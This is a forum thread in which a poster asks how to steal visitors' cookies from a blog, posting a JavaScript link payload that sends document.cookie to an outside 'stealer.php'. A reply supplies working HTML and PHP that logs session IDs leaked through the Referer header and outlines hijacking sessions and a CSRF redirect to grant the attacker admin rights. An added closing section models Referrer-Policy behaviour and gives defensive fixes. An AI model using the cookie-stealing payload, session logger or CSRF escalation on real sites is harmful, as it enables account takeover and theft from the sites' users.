
Referrer cookies?


ghost:

Hey guys

Here's a scenario I was thinking about:

I put a link on my blog to a php file on my personal web space. Is it possible to retrieve the person's cookies from my blog using the php file? For example, say the user's cookie from my blog is called "Cookie A". Is there a way to get "Cookie A" to the php file without using Javascript? i.e. using just a regular link like:

http://www.personalblog.com/test.php

The link can include parameters, i.e.

http://www.personalblog.com/test.php?parameter1=1

but is there any way of retrieving cookies without using Javascript?

If not, are there any tutorials on, or is it even possible to, insert Javascript into an image file?

Thanks very much for your time!


ghost:

It'd help to know how setcookie(); actually works. Meaning, learn the path & domain values explicitly to answer your question.


ghost:

lol sorry, it has to be done WITHOUT using javascript. Sorry.


ghost:

Use the COOKIE Superglobal


ghost:

If I understand your question correctly, you want your cookie stealer to be fed the cookies from site A to your stealer on site B. Commonly we would use document.cookie, but you do not wish to use javascript.

If you have access to use php on this other site, your blog, you can formulate the link using php to interface with the cookies. However, since you cannot use javascript, I assume that you do not have this type of access. Therefore you cannot use php.

So in answer to your question, no, I don't believe so. Someone correct me if I'm wrong, though.


ghost:

See, the site allows me to create links, but for the cookie stealer the code needed is:

javascript:void(window.location="http://www.mysite.com/stealer.php?data="+document.cookie);

but the site strips the javascript bit and only makes the http://www.mysite.com/stealer.php?data= part a link.

The pages are .jsp if that helps. Thanks very much for your help.


ghost:

Where? Is there bbcode in which you can inject this? Tell us more about how it works and perhaps we can get you a different way to utilize what you have.


ghost:

It is possible to be able to read their session cookies if certain criteria are met. Some sites place the session id variable in the url as part of the querystring. If this is the case and you had an image to your (remote) site on that page then the session ID would get sent along as part of the referrer in the request to load the image.

Want to test this? Create ref.html file as follows:

```markup
<html>
<body>
<script type="text/javascript">
function addImg()
{
	var i = document.createElement('img');
	i.style.display = 'none';
	i.src = 'log.php'; // the url to the php script which reads the referrer
	document.body.appendChild(i);
}
</script>
Shove something in the URL after a question mark, then click to create an image, then check out log.txt in this folder
<input type="button" value="create an image" onclick="addImg()" />
</body>
</html>
```

Then create log.php as such:
```markup
<?php
$filename = 'log.txt';
$handle = fopen($filename, 'a');
// The referrer may be missing or carry no querystring; log an empty line in that case
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$pos = strpos($referer, '?');
$needle = ($pos === false) ? '' : substr($referer, $pos);
fwrite($handle, $needle);
fwrite($handle, "\n");
fclose($handle);
// $needle is the querystring (including the ?)
?>
```
Finally create log.txt and make it writeable. Now load up ref.html?foo=bar, hit the button, then check out log.txt.
You'll see that it logged the querystring of the request to the log file.

In an attack scenario once you have the session you could do several things. In most cases you'd try to hijack their session. If the site ties session IDs to IP or does something else to prevent that you can still perform CSRF. You could return a 302 header and redirect the user to example.com/admin/make_admin.php?user_id=42
The browser of the person on the site would then try to load your image and get redirected to the url I gave above. This means **they** are sending the request to make you an admin, which is a valid request (if the site is stupid enough to make that CSRF work).

So, can you steal cookies without client side scripting? Not really, no. Can you steal the session ID without access to cookies? Rarely, but in some cases yes.
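The referrer leak in the post above depends on two things at once: the session ID sitting in the page's querystring, and the browser copying that full URL into the Referer header of a cross-origin image request. The following is an added example (not code from the thread or from HBH) that models the second condition using the policy names defined by the W3C Referrer Policy specification, so a site owner can see which policies let a querystring reach a third party and which do not. The URLs and the list of session parameter names are constructed for the example.

```python
# Added example (not from the thread or from HBH): models what a browser puts in
# the Referer header when a page loads a remote image, under the policy names
# defined by the W3C Referrer Policy specification, and reports whether a session
# ID carried in the page's querystring would reach a third-party origin.
# SESSION_PARAM_NAMES is a constructed list; extend it for your own application.
from urllib.parse import urlsplit, urlunsplit, parse_qs

SESSION_PARAM_NAMES = {"phpsessid", "jsessionid", "sessionid", "session_id", "sid"}

POLICIES = (
    "no-referrer", "no-referrer-when-downgrade", "origin", "origin-when-cross-origin",
    "same-origin", "strict-origin", "strict-origin-when-cross-origin", "unsafe-url",
)


def _host_port(parts):
    host = parts.hostname or ""
    return f"{host}:{parts.port}" if parts.port else host


def origin(url):
    """Scheme, host and port of a URL, without credentials, path or query."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{_host_port(parts)}"


def strip_for_referer(url):
    """A Referer never carries the fragment or embedded user:password."""
    parts = urlsplit(url)
    return urlunsplit((parts.scheme, _host_port(parts), parts.path, parts.query, ""))


def referer_for(page_url, resource_url, policy="strict-origin-when-cross-origin"):
    """Referer value sent when page_url embeds resource_url, or None if none is sent."""
    same_origin = origin(page_url) == origin(resource_url)
    downgrade = urlsplit(page_url).scheme == "https" and urlsplit(resource_url).scheme == "http"
    full = strip_for_referer(page_url)
    origin_only = origin(page_url) + "/"
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "no-referrer-when-downgrade":   # the old browser default
        return None if downgrade else full
    if policy == "origin":
        return origin_only
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "origin-when-cross-origin":
        return full if same_origin else origin_only
    if policy == "strict-origin":
        return None if downgrade else origin_only
    if policy == "strict-origin-when-cross-origin":   # current browser default
        if same_origin:
            return full
        return None if downgrade else origin_only
    raise ValueError(f"unknown referrer policy: {policy}")


def leaked_session_ids(page_url, resource_url, policy="strict-origin-when-cross-origin"):
    """Session parameters from page_url's querystring that a third-party origin would see."""
    if origin(page_url) == origin(resource_url):
        return {}   # same-origin fetch: no third party involved
    referer = referer_for(page_url, resource_url, policy)
    if referer is None:
        return {}
    query = parse_qs(urlsplit(referer).query)
    return {k: v[0] for k, v in query.items() if k.lower() in SESSION_PARAM_NAMES}


if __name__ == "__main__":
    # Constructed URLs: a .jsp page carrying its session ID in the querystring,
    # embedding an image hosted on an unrelated origin.
    page = "https://forum.example/thread.jsp?jsessionid=ABC123&topic=7"
    image = "https://third-party.example/pixel.png"
    for policy in POLICIES:
        print(f"{policy:32} referer={referer_for(page, image, policy)!s:60} "
              f"leak={leaked_session_ids(page, image, policy)}")
```

Running it shows the leak only under `no-referrer-when-downgrade` and `unsafe-url`; the other policies either drop the querystring or the whole header for a cross-origin image. The durable fix is the first condition rather than the second: keep the session ID out of the URL entirely (in PHP, `session.use_only_cookies`), and additionally send a `Referrer-Policy` response header so that pages which still carry sensitive querystrings do not hand them to any third-party resource they embed.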